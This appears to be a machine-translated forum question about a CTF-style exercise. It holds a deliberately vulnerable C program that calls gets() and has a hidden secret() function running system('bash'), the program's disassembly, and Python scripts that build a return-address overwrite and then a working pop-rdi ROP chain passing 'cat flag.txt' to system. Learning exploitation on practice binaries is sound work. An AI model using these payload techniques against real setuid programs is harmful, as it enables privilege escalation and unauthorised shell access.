我试图通过溢出堆栈来获取shell,但是无论我做什么都行不通。 ASLR已启用,但是堆栈cookie已关闭,我无法在堆栈上执行代码。这是代码:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
void secret() {
system("bash");
}
void start() {
char user[32];
puts("User : ");
gets(user);
write(1, "Hello ", 6);
write(1, user, strlen(user));
puts("!");
}
void main() {
if (seteuid(1001) == -1 || setuid(1001) == -1 || setegid(1001) == -1 || setgid(1001) == -1) {
printf("Error for 'setuid'\n");
}
setvbuf(stdout, NULL, _IONBF, 0x500);
start();
}
一旦堆栈超载,在system.c中调用execve,返回一个僵尸外壳。甚至我都用真实的代码称秘密。
这是我的python傻脚本
buf = ""
buf += "A"*32
# RBP
buf += struct.pack("<Q", 0x7fffffffe1c0)
#secret call
buf += struct.pack("<Q", 0x000055555555491a)
f = open("payload", "w")
f.write(buf)
这是执行程序的指令
000000000000091a <secret>:
91a: 55 push %rbp
91b: 48 89 e5 mov %rsp,%rbp
91e: 48 8d 3d 6f 01 00 00 lea 0x16f(%rip),%rdi # a94 <_IO_stdin_used+0x4>
925: e8 66 fe ff ff callq 790 <system@plt>
92a: 90 nop
92b: 5d pop %rbp
92c: c3 retq
000000000000092d <start>:
92d: 55 push %rbp
92e: 48 89 e5 mov %rsp,%rbp
931: 48 83 ec 20 sub $0x20,%rsp
935: 48 8d 3d 5d 01 00 00 lea 0x15d(%rip),%rdi # a99 <_IO_stdin_used+0x9>
93c: e8 1f fe ff ff callq 760 <puts@plt>
941: 48 8d 45 e0 lea -0x20(%rbp),%rax
945: 48 89 c7 mov %rax,%rdi
948: b8 00 00 00 00 mov $0x0,%eax
94d: e8 4e fe ff ff callq 7a0 <gets@plt>
952: ba 06 00 00 00 mov $0x6,%edx
957: 48 8d 35 43 01 00 00 lea 0x143(%rip),%rsi # aa1 <_IO_stdin_used+0x11>
95e: bf 01 00 00 00 mov $0x1,%edi
963: e8 08 fe ff ff callq 770 <write@plt>
968: 48 8d 45 e0 lea -0x20(%rbp),%rax
96c: 48 89 c7 mov %rax,%rdi
96f: e8 0c fe ff ff callq 780 <strlen@plt>
974: 48 89 c2 mov %rax,%rdx
977: 48 8d 45 e0 lea -0x20(%rbp),%rax
97b: 48 89 c6 mov %rax,%rsi
97e: bf 01 00 00 00 mov $0x1,%edi
983: e8 e8 fd ff ff callq 770 <write@plt>
988: 48 8d 3d 19 01 00 00 lea 0x119(%rip),%rdi # aa8 <_IO_stdin_used+0x18>
98f: e8 cc fd ff ff callq 760 <puts@plt>
994: 90 nop
995: c9 leaveq
996: c3 retq
0000000000000997 <main>:
997: 55 push %rbp
998: 48 89 e5 mov %rsp,%rbp
99b: bf e9 03 00 00 mov $0x3e9,%edi
9a0: e8 4b fe ff ff callq 7f0 <seteuid@plt>
9a5: 83 f8 ff cmp $0xffffffff,%eax
9a8: 74 2d je 9d7 <main+0x40>
9aa: bf e9 03 00 00 mov $0x3e9,%edi
9af: e8 1c fe ff ff callq 7d0 <setuid@plt>
9b4: 83 f8 ff cmp $0xffffffff,%eax
9b7: 74 1e je 9d7 <main+0x40>
9b9: bf e9 03 00 00 mov $0x3e9,%edi
9be: e8 1d fe ff ff callq 7e0 <setegid@plt>
9c3: 83 f8 ff cmp $0xffffffff,%eax
9c6: 74 0f je 9d7 <main+0x40>
9c8: bf e9 03 00 00 mov $0x3e9,%edi
9cd: e8 ee fd ff ff callq 7c0 <setgid@plt>
9d2: 83 f8 ff cmp $0xffffffff,%eax
9d5: 75 0c jne 9e3 <main+0x4c>
9d7: 48 8d 3d cc 00 00 00 lea 0xcc(%rip),%rdi # aaa <_IO_stdin_used+0x1a>
9de: e8 7d fd ff ff callq 760 <puts@plt>
9e3: 48 8b 05 8e 06 20 00 mov 0x20068e(%rip),%rax # 201078 <stdout@@GLIBC_2.2.5>
9ea: b9 00 05 00 00 mov $0x500,%ecx
9ef: ba 02 00 00 00 mov $0x2,%edx
9f4: be 00 00 00 00 mov $0x0,%esi
9f9: 48 89 c7 mov %rax,%rdi
9fc: e8 af fd ff ff callq 7b0 <setvbuf@plt>
a01: b8 00 00 00 00 mov $0x0,%eax
a06: e8 22 ff ff ff callq 92d <start>
a0b: 90 nop
a0c: 5d pop %rbp
a0d: c3 retq
a0e: 66 90 xchg %ax,%ax
请帮助
编辑 我设法做到了。 导入结构
buf = "A"*32
# RBP
buf += struct.pack("<Q", 0x7fffffffe1c0)
#POP RDI
buf += struct.pack("<Q", 0x0000000000000a73+0x555555554000)
buf += struct.pack("<Q", 0x7fffffffe1d0)
# call secret
buf += struct.pack("<Q", 0x0000555555554925)
buf += "cat flag.txt\x00"
这是否意味着我必须使用地址接近0x7fffffffe1d0的寄存器并在使用小工具启动aslr时添加一个常量?